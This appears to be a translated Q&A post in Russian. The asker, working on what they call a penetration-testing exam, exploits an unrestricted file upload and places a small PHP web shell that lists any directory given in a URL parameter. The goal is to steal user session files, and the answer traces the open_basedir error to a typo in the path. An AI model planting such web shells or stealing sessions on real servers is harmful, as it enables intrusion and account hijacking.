В качестве одной из задач на экзамене я выполняю тестирование с помощью пера на веб-сервере и после использования уязвимости неограниченной загрузки файлов (https://www.owasp.org/index.php/Unrestricted_File_Upload), Я пытаюсь получить доступ к определенной папке на веб-сервере, и я получаю эту ошибку:
Warning: scandir(): open_basedir restriction in effect. File(C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS) is not within the allowed path(s): (C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs;C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS) in C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs\ticketAttachments\4b3519fbe17e82993e76927e5f253e33\hack.php
Обратите внимание, что путь на самом деле находится в разрешенных путях (я полагаю, что именно в этом и заключалась задача экзамена — украсть все пользовательские сессии).
У меня нет доступа к серверу, поэтому я не могу изменить какие-либо настройки на сервере, мне нужно только получить все файлы sess_ *, которые, вероятно, хранятся в этом C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS
папка.
Это содержимое моего файла hack.php:
<pre style="text-align:left">
<?php
$files = scandir($_GET['path']);
foreach ($files as $file) {
echo $file;
echo "\n";
}
?>
</pre>
Я попытался получить доступ к другому пути в разрешенных путях, и это то же самое.
Но странным является то, что я могу читать содержимое C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs\ticketAttachments
, но не C:\inetpub\vhosts\mysite.com\subdomains\me\httpdocs
, что на самом деле в разрешенных путях.
Я что-то здесь не так делаю?
Это простая проблема с опечатками.
You want to access: C:\inetpub\sitesdata\mysite.com\SESSIONS\USERS
The allowed path contains: C:\inetpub\sitesdata\mysites.com\SESSIONS\USERS
Заметили пропущенные «с»?
Других решений пока нет …